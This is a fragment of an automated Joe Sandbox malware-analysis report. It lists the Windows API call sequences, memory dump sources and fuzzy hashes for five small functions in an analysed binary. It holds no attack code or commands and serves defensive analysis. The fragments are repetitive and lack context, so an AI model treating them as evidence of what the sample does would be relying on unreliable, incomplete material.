                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB37C5C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: GlobalLengthTextWindow$AllocFree
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 478760672-0
                                                                                                                                                                    • Opcode ID: 4ba3391d0c2044a669a027b75972d672eaffb3ee83f023390f284ba870b3ae66
                                                                                                                                                                    • Instruction ID: 4faa487cc9d4ada2345b5738846a802bac369c873a86fcc8ee33bb0551a7911a
                                                                                                                                                                    • Opcode Fuzzy Hash: 4ba3391d0c2044a669a027b75972d672eaffb3ee83f023390f284ba870b3ae66
                                                                                                                                                                    • Instruction Fuzzy Hash: 2B012CB5A00209FFCB04DFA4C588FADBBB9FB48301F108159F905A7240D6F5DA80EB54
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetLastError.KERNEL32(00000008), ref: 5BB3E3BE
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3E3CE
                                                                                                                                                                      • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                                    • ObjectCloseAuditAlarmA.ADVAPI32(00000000,?,?), ref: 5BB3E3ED
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3E400
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharFromMultiWide$AlarmAuditCloseErrorFreeGlobalLastObject
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 570505851-0
                                                                                                                                                                    • Opcode ID: 4787855c26dc9f58430a23df7370736269a33c3c6954f68eaef49bbfb8a40509
                                                                                                                                                                    • Instruction ID: fca22863d3f99f943faca69b11e91b9c4a69742eecb687ada413b4a94e761a88
                                                                                                                                                                    • Opcode Fuzzy Hash: 4787855c26dc9f58430a23df7370736269a33c3c6954f68eaef49bbfb8a40509
                                                                                                                                                                    • Instruction Fuzzy Hash: AA01ECB6901208EFDB01DFA4C948B9EBBB5FB48301F108159F905A7280D7B69B84EB65
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetLastError.KERNEL32(00000008), ref: 5BB3EBCE
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3EBDE
                                                                                                                                                                      • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                                    • BuildCommDCBA.KERNEL32(00000000,?), ref: 5BB3EBF9
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3EC0C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharFromMultiWide$BuildCommErrorFreeGlobalLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4064689889-0
                                                                                                                                                                    • Opcode ID: 2cf87441c1fdc0f2c5e709e05b10e42c50fec51e4941199853f120ae12a6626a
                                                                                                                                                                    • Instruction ID: 66abab8c7e1535f856746cbf6b9673e718472d6d819d40f5254c54d6cde24bf2
                                                                                                                                                                    • Opcode Fuzzy Hash: 2cf87441c1fdc0f2c5e709e05b10e42c50fec51e4941199853f120ae12a6626a
                                                                                                                                                                    • Instruction Fuzzy Hash: 01F0A9B5900208EFDB01DFA4D489BDDBBB5FB04301F508559F905AB280D7F69A84EB65
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetLastError.KERNEL32(00000008), ref: 5BB3CFB5
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3CFC5
                                                                                                                                                                      • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                                    • SetFileAttributesA.KERNEL32(00000000,?), ref: 5BB3CFE0
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3CFF3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharFromMultiWide$AttributesErrorFileFreeGlobalLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3187813303-0
                                                                                                                                                                    • Opcode ID: 8ff9a0fde598f3c7797b3ebd963561f9482c9414ad01d04c88dc2cd2cfa20510
                                                                                                                                                                    • Instruction ID: adafb9b8c4b08c4cddb16dacd5f7d1431cc2158b52c0befcf79a861fce84e049
                                                                                                                                                                    • Opcode Fuzzy Hash: 8ff9a0fde598f3c7797b3ebd963561f9482c9414ad01d04c88dc2cd2cfa20510
                                                                                                                                                                    • Instruction Fuzzy Hash: 19F09CB6900208EFDB00DFE4D449B9DBBB5FB08301F208159E505A7284D7B69688DB95
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetLastError.KERNEL32(00000008), ref: 5BB3DC0B
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3DC1B
                                                                                                                                                                      • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                                    • WaitNamedPipeA.KERNEL32(00000000,?), ref: 5BB3DC36
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3DC49
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharFromMultiWide$ErrorFreeGlobalLastNamedPipeWait
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1815014557-0
                                                                                                                                                                    • Opcode ID: eb5d551fa411110e3d2668beeecc09c24875841c766aa242129c4d930ad6a8a9
                                                                                                                                                                    • Instruction ID: cebafef8a1ba9c8d3df20e1340b8f329bcc40bffde454af0658ffc56fbb20227
                                                                                                                                                                    • Opcode Fuzzy Hash: eb5d551fa411110e3d2668beeecc09c24875841c766aa242129c4d930ad6a8a9
                                                                                                                                                                    • Instruction Fuzzy Hash: F1F0F9B5900208EFDB00EFA4D489B9DBBB9FB08301F508458E805A7280D7F59A84EB95